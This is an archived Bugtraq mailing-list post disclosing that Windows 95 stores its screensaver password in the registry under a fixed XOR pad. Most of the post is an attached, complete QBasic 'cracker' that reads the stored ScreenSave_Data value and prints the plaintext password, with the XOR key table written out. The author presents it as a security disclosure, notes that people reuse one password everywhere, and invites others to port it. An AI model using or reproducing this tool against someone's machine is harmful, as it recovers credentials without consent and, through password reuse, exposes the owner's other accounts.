This is a multi-part message in MIME format. --------------D64CF242C878C90431979B38 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit I got the idea to explore a bit on the w95ss password in the registry after seeing the bruteforce cracker (using tables of bytes). (why this is important to bugtraq? loads of people use 1 password for everything) It's kinda simple. First hex-decode the bytes (like in WSFTP) then XOR them with a pad. A basic prog follows (I was too lazy to get C off the CD). -cp Feel free to recode it in C and post to the list. --------------D64CF242C878C90431979B38 Content-Type: text/plain; charset=us-ascii; name="95sscrk.bas" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="95sscrk.bas" DECLARE FUNCTION DecryptByte! (bytes!, ya!) DECLARE FUNCTION HexVal! (coder$) DIM SHARED byte(16) AS INTEGER CLS PRINT "Crazydog's w95 screensaver cracker, basic version" INPUT "Input char part of ScreenSave_Data(from registry):", code$ z = LEN(code$): IF z MOD 2 <> 0 THEN PRINT "Must be even # of chars!": END ON ERROR GOTO 40 FOR y = 1 TO z STEP 2 balon = balon + 1 nibbleone$ = MID$(code$, y, 1): nibbletwo$ = MID$(code$, y + 1, 1) mega = (HexVal(nibbleone$) * 16) + HexVal(nibbletwo$) IF HexVal(nibbletwo$) < 0 THEN mega = -255 ' one if only. IF mega < 0 THEN PRINT "That didn't make any sense.": END byte(y) = DecryptByte(mega, balon): wilma$ = wilma$ + CHR$(byte(y)) NEXT y PRINT "The code is: "; wilma$; " (case insensitive)" END 40 PRINT "[unknown]": END FUNCTION DecryptByte (bytes, ya) DIM xorpattern(31) AS INTEGER xorpattern(1) = &H48: xorpattern(2) = &HEE: xorpattern(3) = &H76 xorpattern(4) = &H1D: xorpattern(5) = &H67: xorpattern(6) = &H69 xorpattern(7) = &HA1: xorpattern(8) = &H1B: xorpattern(9) = &H7A xorpattern(10) = &H8C: xorpattern(11) = &H47: xorpattern(12) = &HF8 xorpattern(13) = &H54: xorpattern(14) = &H95: xorpattern(15) = &H97 xorpattern(16) = &H5F DecryptByte = bytes XOR xorpattern(ya) END FUNCTION FUNCTION HexVal (coder$) coder$ = UCASE$(coder$) SELECT CASE coder$ CASE "0" whee = 0 CASE "1" whee = 1 CASE "2" whee = 2 CASE "3" whee = 3 CASE "4" whee = 4 CASE "5" whee = 5 CASE "6" whee = 6 CASE "7" whee = 7 CASE "8" whee = 8 CASE "9" whee = 9 CASE "A" whee = 10 CASE "B" whee = 11 CASE "C" whee = 12 CASE "D" whee = 13 CASE "E" whee = 14 CASE "F" whee = 15 CASE ELSE whee = -21 END SELECT HexVal = whee END FUNCTION --------------D64CF242C878C90431979B38--
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:54:51 PDT